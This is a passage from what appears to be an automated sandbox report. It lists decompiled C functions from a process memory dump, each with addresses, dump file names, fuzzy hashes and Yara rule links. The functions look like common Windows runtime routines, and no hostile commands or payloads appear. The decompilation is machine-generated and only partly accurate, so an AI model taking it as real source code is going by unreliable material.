				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04affec0
0x04affec0
0x04affecf
0x04affed9
0x04affede
0x04affee0
0x04affeeb
0x04affef3
0x04affef6
0x04affef9
0x04afff04
0x04afff16
0x04afff06
0x04afff0f
0x04afff0f
0x04afff21
0x04afff22
0x04afff24
0x04afff29
0x04afff3e

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9816ddf2fe08df83c842e189e0d3d5652e5a4187833eeb76a0a05a0dd70a38b1
Instruction ID: 8f1e85252d4a9f8789b043956c95d2e9d4d9be72d7fbc26b953d568273243dcb
Opcode Fuzzy Hash: 9816ddf2fe08df83c842e189e0d3d5652e5a4187833eeb76a0a05a0dd70a38b1
Instruction Fuzzy Hash: 30018871E00208AFDB14EBA9D945FAFB7B8EF44714F40406AB9019B290EA74E901C794

Uniqueness

Uniqueness Score: -1.00%

Function 04AFFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04AFFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4b3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04A8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04A67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04affe3f
0x04affe3f
0x04affe4e
0x04affe58
0x04affe5d
0x04affe5f
0x04affe6a
0x04affe72
0x04affe75
0x04affe78
0x04affe83
0x04affe95
0x04affe85
0x04affe8e
0x04affe8e
0x04affea0
0x04affea1
0x04affea3
0x04affea8
0x04affebd

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2717dcadbcfc16c81a2e2e1ea7730cfbf75ccb9264808c6870192452e6b9283
Instruction ID: af1b67ebdf81058bb7b8faea5459f6cb7905fd0c9cf65bb323623dacee772eef
Opcode Fuzzy Hash: c2717dcadbcfc16c81a2e2e1ea7730cfbf75ccb9264808c6870192452e6b9283
Instruction Fuzzy Hash: E7018471E00208AFDB14EFA9D845FAEB7B8EF44714F00406AB901AB291DA74E901C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04A5B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A5B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04A67D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04AC7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x04a5b037
0x04a5b039
0x04a5b03b
0x04a5b040
0x04aaa60e
0x00000000
0x00000000
0x04aaa61d
0x04a5b04b
0x04a5b04e
0x04aaa627
0x04aaa634
0x00000000
0x00000000
0x04aaa641
0x04aaa653
0x04aaa643
0x04aaa64c
0x04aaa64c
0x04aaa65b
0x00000000
0x00000000
0x00000000
0x04aaa66c
0x04a5b057
0x04a5b057
0x04a5b057
0x04a5b046
0x04a5b046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 9b1c587afa34cd978be3ee933122b99f7b875f100e29bc08d560720a87d1a770
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 51017C723009809FE322CB5CCA88F6677E8EB45754F0940A5E919CBAA1E738FC40CA20

Uniqueness

Uniqueness Score: -1.00%

Function 04B11074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B11074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04B1165E(__ebx, 0x4b38ae4, (__edx -  *0x4b38b04 >> 0x14) + (__edx -  *0x4b38b04 >> 0x14), __edi, __ecx, (__edx -  *0x4b38b04 >> 0x14) + (__edx -  *0x4b38b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04B0AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04A67D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04AFFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04b11074
0x04b11080
0x04b11082
0x04b1108a
0x04b1108f
0x04b11093
0x04b110ab
0x04b110ab
0x04b110c3
0x04b110cf
0x04b110e1
0x04b110d1
0x04b110da
0x04b110da
0x04b110e9
0x04b110f5
0x04b110f5
0x04b110fe

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c7f50274f0ce59d2d114840c232b930e6229edb9450a9b98f5c0358a6396f2
Instruction ID: 13cc677fa07374802ae191db9280af9f2f3f588cd3658f2930c8ff9ea5d547e9
Opcode Fuzzy Hash: 06c7f50274f0ce59d2d114840c232b930e6229edb9450a9b98f5c0358a6396f2
Instruction Fuzzy Hash: BC0128725047419FD710EB7DC944B1A77D5EB88318F04C969F985832A0EE31F940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B18ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04B18ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4b3d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04A67D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04b18ed6
0x04b18ee5
0x04b18eed
0x04b18ef0
0x04b18efa
0x04b18f03
0x04b18f0c
0x04b18f15
0x04b18f24
0x04b18f27
0x04b18f31
0x04b18f43
0x04b18f33
0x04b18f3c
0x04b18f3c
0x04b18f4e
0x04b18f4f
0x04b18f51
0x04b18f56
0x04b18f69

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de178d9f6c70d44733c24457b2f1b9c34979749ac24c7f5a1ffdb82ef9aa7db1
Instruction ID: d1a129742dcb84384d8570a069d8295dfbf81571f2d7873eb3b2467317d775b4
Opcode Fuzzy Hash: de178d9f6c70d44733c24457b2f1b9c34979749ac24c7f5a1ffdb82ef9aa7db1
Instruction Fuzzy Hash: C7111E70E002099FDB04EFA9D541BAEF7F4FF08304F4442AAE519EB381E634A940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B18A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04B18A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4b3d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04A67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A8B640(E04A89AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04b18a62
0x04b18a71
0x04b18a79
0x04b18a82
0x04b18a85
0x04b18a89
0x04b18a8c
0x04b18a8f
0x04b18a92
0x04b18a95
0x04b18a9f
0x04b18ab1
0x04b18aa1
0x04b18aaa
0x04b18aaa
0x04b18abc
0x04b18abd
0x04b18abf
0x04b18ac4
0x04b18ada

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5f833d614b22d893ad4e8819591afcf26f737e59d52f73d762b1bd37f7ad3d
Instruction ID: 14c464e40ae8ec53151e75bc6ac5c34cc45ae7b08342bdf67a834124ac471fa2
Opcode Fuzzy Hash: 9c5f833d614b22d893ad4e8819591afcf26f737e59d52f73d762b1bd37f7ad3d
Instruction Fuzzy Hash: 63012CB1A1021CAFDB00EFA9D9819EEB7B8FF48314F50405AF905E7351E634AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A4DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A4DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04A4DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04A4E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04A4E8B0(__ecx, _t14, 0xfff);
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x04a4db64
0x04a4db66
0x04a4db6b
0x04a4dbaa
0x04a4db71
0x04a4db76
0x04a4db7a
0x04a4dba3
0x04a4db7c
0x04a4db87
0x04a4db8b
0x04aa4fa1
0x04aa4fb3
0x04aa4fb8
0x04a4db91
0x04a4db96
0x04a4db98
0x04a4db98
0x04a4db8b
0x04a4db7a
0x04a4db9d
0x04a4dba2

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: c07df0a7b800c3a27fa69bc2213d0283149349199c1b8fcf9973af442a1b5477
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 46F0F6333016229FE7726B558980F2FB6A59FE1A64F160035F1059B344CAA0AC0396E0

Uniqueness

Uniqueness Score: -1.00%

Function 04A4B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A4B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04A67D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04A67D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04AC7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x04a4b1e8
0x04a4b1ea
0x04a4b1f3
0x04aa4a17
0x04a4b1f9
0x04a4b1f9
0x04a4b1f9
0x04a4b201
0x04aa4a21
0x04aa4a2e
0x00000000
0x00000000
0x04aa4a3b
0x04aa4a4d
0x04aa4a3d
0x04aa4a46
0x04aa4a46
0x04aa4a55
0x00000000
0x00000000
0x00000000
0x04a4b20a
0x04a4b20a
0x04a4b20a
0x04a4b20a

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: b9ff5680dc2a1eed4474b34686f7735ae56b472a1a23ca23780c5b002e0398b7
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: EE01F432300680DFE322975DC904F697BA8EFC5758F0804A2FA158B6B1E7B8F810C725

Uniqueness

Uniqueness Score: -1.00%

Function 04ADFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04ADFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4b3d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04A67D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04adfe96
0x04adfe9e
0x04adfea1
0x04adfead
0x04adfeb3
0x04adfeb9
0x04adfec3
0x04adfed5
0x04adfec5
0x04adfece
0x04adfece
0x04adfee0
0x04adfee1
0x04adfee3
0x04adfee8
0x04adfefb

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcfcffd9f9b1a5352217364d2516b71d2abdb61de0f07b8005ad8ac229b4821
Instruction ID: a868def97e98a1891bf2c70817c5b99234b8575aae3ef71732324cb08129a6af
Opcode Fuzzy Hash: 6fcfcffd9f9b1a5352217364d2516b71d2abdb61de0f07b8005ad8ac229b4821
Instruction Fuzzy Hash: DD016270A00208EFDB14EFA8D541A6EB7F4FF04704F104169B505DB382EA35E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B18F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04B18F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4b3d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04A67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04b18f6a
0x04b18f79
0x04b18f81
0x04b18f84
0x04b18f8b
0x04b18f91
0x04b18f94
0x04b18f9e
0x04b18fb0
0x04b18fa0
0x04b18fa9
0x04b18fa9
0x04b18fbb
0x04b18fbc
0x04b18fbe
0x04b18fc3
0x04b18fd6

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4357dab527a94caaaa3f63a17fcbb68881b03b4b43c967c851e41386ef7018
Instruction ID: f042990d5a19693cbb8755e0fd4ea5b9f7e194666f2bdbdb058f854b15edf420
Opcode Fuzzy Hash: bb4357dab527a94caaaa3f63a17fcbb68881b03b4b43c967c851e41386ef7018
Instruction Fuzzy Hash: 0B014474A0020CAFDB00EFA8D545AAEB7F4FF18304F50445AB905EB390EA34EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04B0131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04B0131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4b3d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04A67D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04b0131b
0x04b0132a
0x04b01330
0x04b01336
0x04b0133e
0x04b01341
0x04b01344
0x04b0134f
0x04b01361
0x04b01351
0x04b0135a
0x04b0135a
0x04b0136c
0x04b0136d
0x04b0136f
0x04b01374
0x04b01387

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b342d2fa182e399098ac790d352ee12a6025f703bcd9be01498560d092277c
Instruction ID: e3bcde1e872d57b87f5f749e7f88e5fb685b078162244d7888e581df7197ceae
Opcode Fuzzy Hash: 31b342d2fa182e399098ac790d352ee12a6025f703bcd9be01498560d092277c
Instruction Fuzzy Hash: AB013171A01208AFDB04EFA9D545AAEB7F4FF08704F40805AB945EB391E634AA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04B01608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04B01608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4b3d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04A67D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x04b01608
0x04b01617
0x04b0161d
0x04b01625
0x04b01628
0x04b0162b
0x04b01636
0x04b01648
0x04b01638
0x04b01641
0x04b01641
0x04b01653
0x04b01654
0x04b01656
0x04b0165b
0x04b0166e

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46cf0716b5b9a6ab158d4b33f8b150fb4bea8e1ee9c04e2e7f7c3d299095d70b
Instruction ID: 8a35c88531974b8a15d06f16ba4dd0c0cd030141a6b73ba5d34e537e2d1ebd27
Opcode Fuzzy Hash: 46cf0716b5b9a6ab158d4b33f8b150fb4bea8e1ee9c04e2e7f7c3d299095d70b
Instruction Fuzzy Hash: 60F06271E10248EFDB04EFA9D945AAEBBF8EF04304F4440A9B905EB391E634A900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04A6C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A6C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04A6C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4a211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04B188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x04a6c577
0x04a6c57d
0x04a6c581
0x04a6c5b5
0x04a6c5b9
0x04a6c5ce
0x04a6c5ce
0x04a6c5ca
0x00000000
0x04a6c5ca
0x04a6c5c4
0x04a6c5c8
0x00000000
0x00000000
0x00000000
0x04a6c5ad
0x00000000
0x04a6c5af

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37cfb1da98854923cbd180c034a4c4766870bafba0d89ce2e28a460e719bdfd2
Instruction ID: 43aed890b85c584b4a547feaaab7d9506e55a3ee6f71185b63af874fed415681
Opcode Fuzzy Hash: 37cfb1da98854923cbd180c034a4c4766870bafba0d89ce2e28a460e719bdfd2
Instruction Fuzzy Hash: 0CF0B4F29956949FE731DB18C914B227BE69B0D774F44446BD48787112C6A4F880C251

Uniqueness

Uniqueness Score: -1.00%

Function 04B18D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04B18D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4b3d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04A67D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04b18d34
0x04b18d43
0x04b18d4b
0x04b18d4e
0x04b18d52
0x04b18d5c
0x04b18d6e
0x04b18d5e
0x04b18d67
0x04b18d67
0x04b18d79
0x04b18d7a
0x04b18d7c
0x04b18d81
0x04b18d94

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5937568689653357224fc1a0e608de0e1e07f41e9f74b8a6a2edc663b1bea904
Instruction ID: 63fc614d92a317a37d3ac2a19f24bae0c2f3f8c6eeea2ecb2565b348497b23f0
Opcode Fuzzy Hash: 5937568689653357224fc1a0e608de0e1e07f41e9f74b8a6a2edc663b1bea904
Instruction Fuzzy Hash: 73F0B470E04708AFD704FFB8D541AAEB7B8FF04304F508099E906EB290EA34E900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04B02073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04B02073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04AFFD22(__ecx);
				_t19 =  *0x4b3849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4b38748; // 0x0
					if(__eflags <= 0) {
						E04B01C06();
